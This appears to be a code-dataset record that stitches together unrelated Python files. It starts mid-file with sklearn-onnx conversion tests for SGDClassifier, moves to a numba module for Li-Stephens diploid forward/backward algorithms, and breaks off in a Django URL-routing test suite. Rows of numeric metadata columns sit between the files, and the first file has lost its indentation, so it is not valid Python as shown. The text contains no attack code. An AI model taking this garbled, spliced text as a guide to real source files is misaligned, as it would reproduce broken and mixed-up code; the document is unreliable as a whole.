model_onnx,
basename="SklearnSGDClassifierMultiHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLog-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
X = np.array([X[1], X[1]])
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiLog",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log_l1_no_intercept(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', penalty='l1', fit_intercept=False,
random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLogL1NoIntercept-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log_l1_no_intercept(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', penalty='l1', fit_intercept=False,
random_state=42), 5)
X = np.array([X[4], X[4]])
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiLogL1NoIntercept-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_elasticnet_power_t(self):
model, X = fit_classification_model(
SGDClassifier(penalty='elasticnet', l1_ratio=0.3,
power_t=2, random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryElasticnetPowerT-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_elasticnet_power_t(self):
model, X = fit_classification_model(
SGDClassifier(penalty='elasticnet', l1_ratio=0.3,
power_t=2, random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiElasticnetPowerT-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_squared_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='squared_hinge', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinarySquaredHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_squared_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='squared_hinge', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiSquaredHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_perceptron(self):
model, X = fit_classification_model(
SGDClassifier(loss='perceptron', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryPerceptron-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_perceptron(self):
model, X = fit_classification_model(
SGDClassifier(loss='perceptron', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiPerceptron-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_hinge_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 2, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierBinaryHingeInt-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierMultiHingeInt-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 2, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLogInt",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log_int(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 5, is_int=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", Int64TensorType([None, X.shape[1]]))],
)
X = X[6:8]
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnSGDClassifierMultiLogInt",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_multi_class_nocl(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42),
2, label_string=True)
model_onnx = convert_sklearn(
model,
"multi-class nocl",
[("input", FloatTensorType([None, X.shape[1]]))],
options={id(model): {'nocl': True}})
self.assertIsNotNone(model_onnx)
sonx = str(model_onnx)
assert 'classlabels_strings' not in sonx
assert 'cl0' not in sonx
dump_data_and_model(
X[6:8], model, model_onnx, classes=model.classes_,
basename="SklearnSGDMultiNoCl", verbose=False,
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')")
if __name__ == "__main__":
unittest.main()
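# Standalone sketch of the same conversion pattern (illustrative; the iris
# dataset and the output filename are assumptions, not part of this suite):
def _demo_convert_sgd():
    from sklearn.datasets import load_iris

    X, y = load_iris(return_X_y=True)
    clf = SGDClassifier(loss="log", random_state=42).fit(X, y)
    onx = convert_sklearn(
        clf,
        "SGD iris classifier",
        [("input", FloatTensorType([None, X.shape[1]]))],
    )
    with open("sgd_iris.onnx", "wb") as f:
        f.write(onx.SerializeToString())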
| 41.061758
| 79
| 0.559727
| 1,630
| 17,287
| 5.604908
| 0.076687
| 0.054181
| 0.027036
| 0.031195
| 0.880363
| 0.878284
| 0.867666
| 0.867666
| 0.861756
| 0.861756
| 0
| 0.020627
| 0.332562
| 17,287
| 420
| 80
| 41.159524
| 0.771191
| 0.002603
| 0
| 0.729798
| 0
| 0
| 0.245997
| 0.133326
| 0
| 0
| 0
| 0
| 0.050505
| 1
| 0.045455
| false
| 0
| 0.017677
| 0
| 0.065657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
604ee103a6394a9ea00cd37763ba4d5e6ceab2e1
| 15,433
|
py
|
Python
|
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
lshmm/forward_backward/fb_diploid_samples_variants.py
|
jeromekelleher/lshmm
|
58e0c3395f222e756bb10a0063f5118b20176a01
|
[
"MIT"
] | null | null | null |
"""Collection of functions to run forwards and backwards algorithms on diploid genotype data, where the data is structured as samples x variants."""
import numba as nb
import numpy as np
EQUAL_BOTH_HOM = 4
UNEQUAL_BOTH_HOM = 0
BOTH_HET = 7
REF_HOM_OBS_HET = 1
REF_HET_OBS_HOM = 2
# https://github.com/numba/numba/issues/1269
@nb.njit
def np_apply_along_axis(func1d, axis, arr):
"""Create numpy-like functions for max, sum etc."""
assert arr.ndim == 2
assert axis in [0, 1]
if axis == 0:
result = np.empty(arr.shape[1])
for i in range(len(result)):
result[i] = func1d(arr[:, i])
else:
result = np.empty(arr.shape[0])
for i in range(len(result)):
result[i] = func1d(arr[i, :])
return result
@nb.njit
def np_amax(array, axis):
"""Numba implementation of numpy vectorised maximum."""
return np_apply_along_axis(np.amax, axis, array)
@nb.njit
def np_sum(array, axis):
"""Numba implementation of numpy vectorised sum."""
return np_apply_along_axis(np.sum, axis, array)
@nb.njit
def np_argmax(array, axis):
"""Numba implementation of numpy vectorised argmax."""
return np_apply_along_axis(np.argmax, axis, array)
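# Quick sanity check of the helpers above (illustrative only): inside @nb.njit
# code they stand in for np.amax / np.sum / np.argmax with an axis argument.
def _demo_axis_helpers():
    arr = np.arange(6.0).reshape(2, 3)
    assert np.allclose(np_amax(arr, 0), arr.max(axis=0))
    assert np.allclose(np_sum(arr, 1), arr.sum(axis=1))
    assert np.allclose(np_argmax(arr, 0), arr.argmax(axis=0))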
@nb.jit
def forwards_ls_dip(n, m, G, s, e, r, norm=True):
"""Matrix based diploid LS forward algorithm using numpy vectorisation."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = 4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64) + 2 * (
G[:, :, 0] == 1
).astype(np.int64)
if s[0, 0] == 1:
index += 1
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
c = np.ones(m)
r_n = r / n
if norm:
c[0] = np.sum(F[:, :, 0])
F[:, :, 0] *= 1 / c[0]
# Forwards
for l in range(1, m):
index = 4 * np.equal(G[:, :, l], s[0, l]).astype(np.int64) + 2 * (
G[:, :, l] == 1
).astype(np.int64)
if s[0, l] == 1:
index += 1
# No change in both
F[:, :, l] = (1 - r[l]) ** 2 * F[:, :, l - 1]
# Both change
F[:, :, l] += (r_n[l]) ** 2
# One changes
sum_j = np_sum(F[:, :, l - 1], 0).repeat(n).reshape((-1, n))
F[:, :, l] += ((1 - r[l]) * r_n[l]) * (sum_j + sum_j.T)
# Emission
F[:, :, l] *= e[index.ravel(), l].reshape(n, n)
c[l] = np.sum(F[:, :, l])
F[:, :, l] *= 1 / c[l]
ll = np.sum(np.log10(c))
else:
# Forwards
for l in range(1, m):
index = 4 * np.equal(G[:, :, l], s[0, l]).astype(np.int64) + 2 * (
G[:, :, l] == 1
).astype(np.int64)
if s[0, l] == 1:
index += 1
# No change in both
F[:, :, l] = (1 - r[l]) ** 2 * F[:, :, l - 1]
# Both change
F[:, :, l] += (r_n[l]) ** 2 * np.sum(F[:, :, l - 1])
# One changes
sum_j = np_sum(F[:, :, l - 1], 0).repeat(n).reshape((-1, n)).T
F[:, :, l] += ((1 - r[l]) * r_n[l]) * (sum_j + sum_j.T)
# Emission
F[:, :, l] *= e[index.ravel(), l].reshape(n, n)
ll = np.log10(np.sum(F[:, :, l]))
return F, c, ll
@nb.jit
def backwards_ls_dip(n, m, G, s, e, c, r):
"""Matrix based diploid LS backward algorithm using numpy vectorisation."""
# Initialise the backward tensor
B = np.zeros((n, n, m))
# Initialise
B[:, :, m - 1] = 1
r_n = r / n
# Backwards
for l in range(m - 2, -1, -1):
index = (
4 * np.equal(G[:, :, l + 1], s[0, l + 1]).astype(np.int64)
+ 2 * (G[:, :, l + 1] == 1).astype(np.int64)
+ np.int64(s[0, l + 1] == 1)
).ravel()
# Both change
B[:, :, l] = r_n[l + 1] ** 2 * np.sum(
e[index, l + 1].reshape(n, n) * B[:, :, l + 1]
)
# No change in both
B[:, :, l] += (
(1 - r[l + 1]) ** 2 * B[:, :, l + 1] * e[index, l + 1].reshape(n, n)
)
sum_j = (
np_sum(B[:, :, l + 1] * e[index, l + 1].reshape(n, n), 0)
.repeat(n)
.reshape((-1, n))
)
B[:, :, l] += ((1 - r[l + 1]) * r_n[l + 1]) * (sum_j + sum_j.T)
B[:, :, l] *= 1 / c[l + 1]
return B
@nb.jit
def forward_ls_dip_starting_point(n, m, G, s, e, r):
"""Naive implementation of LS diploid forwards algorithm."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = (
4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64)
+ 2 * (G[:, :, 0] == 1).astype(np.int64)
+ np.int64(s[0, 0] == 1)
)
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
r_n = r / n
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j1_change = np.zeros(n)
F_j2_change = np.zeros(n)
F_both_change = 0
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
for j1 in range(n):
for j2 in range(n):
F_both_change += r_n[l] ** 2 * F[j1, j2, l - 1]
for j1 in range(n):
for j2 in range(n): # This is the variable to sum over - it changes
F_j2_change[j1] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
for j2 in range(n):
for j1 in range(n): # This is the variable to sum over - it changes
F_j1_change[j2] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
F[:, :, l] = F_both_change
for j1 in range(n):
F[j1, :, l] += F_j2_change
for j2 in range(n):
F[:, j2, l] += F_j1_change
for j1 in range(n):
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
ll = np.log10(np.sum(F[:, :, l]))
return F, ll
@nb.jit
def backward_ls_dip_starting_point(n, m, G, s, e, r):
"""Naive implementation of LS diploid backwards algorithm."""
# Backwards
B = np.zeros((n, n, m))
# Initialise
B[:, :, m - 1] = 1
r_n = r / n
for l in range(m - 2, -1, -1):
# Determine the various components
B_no_change = np.zeros((n, n))
B_j1_change = np.zeros(n)
B_j2_change = np.zeros(n)
B_both_change = 0
# Evaluate the emission matrix at this site, for all pairs
e_tmp = np.zeros((n, n))
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l + 1] == 1:
# OBS is het
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[BOTH_HET, l + 1]
else: # REF is hom
e_tmp[j1, j2] = e[REF_HOM_OBS_HET, l + 1]
else:
# OBS is hom
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[REF_HET_OBS_HOM, l + 1]
else: # REF is hom
if G[j1, j2, l + 1] == s[0, l + 1]: # Equal
e_tmp[j1, j2] = e[EQUAL_BOTH_HOM, l + 1]
else: # Unequal
e_tmp[j1, j2] = e[UNEQUAL_BOTH_HOM, l + 1]
for j1 in range(n):
for j2 in range(n):
B_no_change[j1, j2] = (
(1 - r[l + 1]) ** 2 * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
for j1 in range(n):
for j2 in range(n):
B_both_change += r_n[l + 1] ** 2 * e_tmp[j1, j2] * B[j1, j2, l + 1]
for j1 in range(n):
for j2 in range(n): # This is the variable to sum over - it changes
B_j2_change[j1] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
for j2 in range(n):
for j1 in range(n): # This is the variable to sum over - it changes
B_j1_change[j2] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B[:, :, l] = B_both_change
for j1 in range(n):
B[j1, :, l] += B_j2_change
for j2 in range(n):
B[:, j2, l] += B_j1_change
for j1 in range(n):
for j2 in range(n):
B[j1, j2, l] += B_no_change[j1, j2]
return B
@nb.jit
def forward_ls_dip_loop(n, m, G, s, e, r, norm=True):
"""LS diploid forwards algoritm without vectorisation."""
# Initialise the forward tensor
F = np.zeros((n, n, m))
F[:, :, 0] = 1 / (n ** 2)
index = (
4 * np.equal(G[:, :, 0], s[0, 0]).astype(np.int64)
+ 2 * (G[:, :, 0] == 1).astype(np.int64)
+ np.int64(s[0, 0] == 1)
)
F[:, :, 0] *= e[index.ravel(), 0].reshape(n, n)
r_n = r / n
c = np.ones(m)
if norm:
c[0] = np.sum(F[:, :, 0])
F[:, :, 0] *= 1 / c[0]
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j_change = np.zeros(n)
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
F_j_change[j1] += (1 - r[l]) * r_n[l] * F[j2, j1, l - 1]
F[:, :, l] = r_n[l] ** 2
for j1 in range(n):
F[j1, :, l] += F_j_change
F[:, j1, l] += F_j_change
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
c[l] = np.sum(F[:, :, l])
F[:, :, l] *= 1 / c[l]
ll = np.sum(np.log10(c))
else:
for l in range(1, m):
# Determine the various components
F_no_change = np.zeros((n, n))
F_j1_change = np.zeros(n)
F_j2_change = np.zeros(n)
F_both_change = 0
for j1 in range(n):
for j2 in range(n):
F_no_change[j1, j2] = (1 - r[l]) ** 2 * F[j1, j2, l - 1]
F_j1_change[j1] += (1 - r[l]) * r_n[l] * F[j2, j1, l - 1]
F_j2_change[j1] += (1 - r[l]) * r_n[l] * F[j1, j2, l - 1]
F_both_change += r_n[l] ** 2 * F[j1, j2, l - 1]
F[:, :, l] = F_both_change
for j1 in range(n):
F[j1, :, l] += F_j2_change
F[:, j1, l] += F_j1_change
for j2 in range(n):
F[j1, j2, l] += F_no_change[j1, j2]
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l] == 1:
# OBS is het
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[BOTH_HET, l]
else: # REF is hom
F[j1, j2, l] *= e[REF_HOM_OBS_HET, l]
else:
# OBS is hom
if G[j1, j2, l] == 1: # REF is het
F[j1, j2, l] *= e[REF_HET_OBS_HOM, l]
else: # REF is hom
if G[j1, j2, l] == s[0, l]: # Equal
F[j1, j2, l] *= e[EQUAL_BOTH_HOM, l]
else: # Unequal
F[j1, j2, l] *= e[UNEQUAL_BOTH_HOM, l]
ll = np.log10(np.sum(F[:, :, l]))
return F, c, ll
@nb.jit
def backward_ls_dip_loop(n, m, G, s, e, c, r):
"""LS diploid backwards algoritm without vectorisation."""
# Initialise the backward tensor
B = np.zeros((n, n, m))
B[:, :, m - 1] = 1
r_n = r / n
for l in range(m - 2, -1, -1):
# Determine the various components
B_no_change = np.zeros((n, n))
B_j_change = np.zeros(n)
B_both_change = 0
# Evaluate the emission matrix at this site, for all pairs
e_tmp = np.zeros((n, n))
for j1 in range(n):
for j2 in range(n):
# What is the emission?
if s[0, l + 1] == 1:
# OBS is het
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[BOTH_HET, l + 1]
else: # REF is hom
e_tmp[j1, j2] = e[REF_HOM_OBS_HET, l + 1]
else:
# OBS is hom
if G[j1, j2, l + 1] == 1: # REF is het
e_tmp[j1, j2] = e[REF_HET_OBS_HOM, l + 1]
else: # REF is hom
if G[j1, j2, l + 1] == s[0, l + 1]: # Equal
e_tmp[j1, j2] = e[EQUAL_BOTH_HOM, l + 1]
else: # Unequal
e_tmp[j1, j2] = e[UNEQUAL_BOTH_HOM, l + 1]
for j1 in range(n):
for j2 in range(n):
B_no_change[j1, j2] = (
(1 - r[l + 1]) ** 2 * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B_j_change[j1] += (
(1 - r[l + 1]) * r_n[l + 1] * B[j1, j2, l + 1] * e_tmp[j1, j2]
)
B_both_change += r_n[l + 1] ** 2 * e_tmp[j1, j2] * B[j1, j2, l + 1]
B[:, :, l] = B_both_change
for j1 in range(n):
B[:, j1, l] += B_j_change
B[j1, :, l] += B_j_change
for j2 in range(n):
B[j1, j2, l] += B_no_change[j1, j2]
B[:, :, l] *= 1 / c[l + 1]
return B
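# Minimal smoke test (illustrative; the toy shapes and probabilities are
# assumptions based on the signatures above, not values from the package):
def _demo_forward_backward(n=4, m=5, seed=0):
    rng = np.random.default_rng(seed)
    G = rng.integers(0, 3, size=(n, n, m))  # reference genotype pairs, coded 0/1/2
    s = rng.integers(0, 3, size=(1, m))     # observed genotypes at each site
    e = np.full((8, m), 0.1)                # emission matrix indexed by the codes above
    r = np.full(m, 0.05)                    # per-site recombination probabilities
    r[0] = 0.0
    F, c, ll = forward_ls_dip_loop(n, m, G, s, e, r, norm=True)
    B = backward_ls_dip_loop(n, m, G, s, e, c, r)
    return ll, F * B  # per-site products give (unnormalised) pair posteriors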
| 32.219207
| 148
| 0.404717
| 2,331
| 15,433
| 2.567568
| 0.058773
| 0.030409
| 0.041771
| 0.027068
| 0.89056
| 0.861988
| 0.820384
| 0.776608
| 0.749875
| 0.746867
| 0
| 0.061659
| 0.436727
| 15,433
| 478
| 149
| 32.286611
| 0.626826
| 0.132767
| 0
| 0.760736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006135
| 1
| 0.030675
| false
| 0
| 0.006135
| 0
| 0.067485
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60b3f693e61171f630f0565af5f3b0a5add7c20c
| 35,716
|
py
|
Python
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 1
|
2019-12-13T13:22:06.000Z
|
2019-12-13T13:22:06.000Z
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 23
|
2019-12-05T23:18:46.000Z
|
2020-04-13T14:08:22.000Z
|
src/tests/orders/testView.py
|
c3loc/squirrel
|
8074dbc74a9a15fc665fcaef617b401759ea7e0c
|
[
"MIT"
] | 2
|
2019-12-06T08:14:31.000Z
|
2020-06-18T20:30:26.000Z
|
from test.support import EnvironmentVarGuard
from django.contrib.auth.models import Permission, User
from django.test import TestCase
from django.urls import resolve
from squirrel.orders import views
from squirrel.orders.models import Event, Order, Product, Team, Vendor
class RoutingTests(TestCase):
"""Test routing of all urlpatterns"""
def test_orders_resolves_orders(self):
view = resolve("/orders")
self.assertEqual(view.url_name, "orders")
def test_new_order_resolves_new_order(self):
view = resolve("/orders/new")
self.assertEqual(view.func, views.order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_order_resolves_order(self):
view = resolve("/orders/23")
self.assertEqual(view.func, views.order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"order_id": 23})
def test_delete_order_resolves_delete_order(self):
view = resolve("/orders/delete/19")
self.assertEqual(view.func, views.delete_order)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"order_id": 19})
def test_new_event_resolves_new_event(self):
view = resolve("/events/new")
self.assertEqual(view.func, views.event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_event_resolves_event(self):
view = resolve("/events/23")
self.assertEqual(view.func, views.event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"event_id": 23})
def test_delete_event_resolves_delete_event(self):
view = resolve("/events/delete/19")
self.assertEqual(view.func, views.delete_event)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"event_id": 19})
def test_products_resolves_products(self):
view = resolve("/products")
self.assertEqual(view.url_name, "products")
def test_new_product_resolves_new_product(self):
view = resolve("/products/new")
self.assertEqual(view.func, views.product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {})
def test_product_resolves_product(self):
view = resolve("/products/17")
self.assertEqual(view.func, views.product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"product_id": 17})
def test_delete_product_resolves_delete_product(self):
view = resolve("/products/delete/12")
self.assertEqual(view.func, views.delete_product)
self.assertEqual(view.args, ())
self.assertEqual(view.kwargs, {"product_id": 12})
def test_teams_resolves_teams(self):
view = resolve("/teams")
self.assertEqual(view.url_name, "teams")
def test_new_team_resolves_new_team(self):
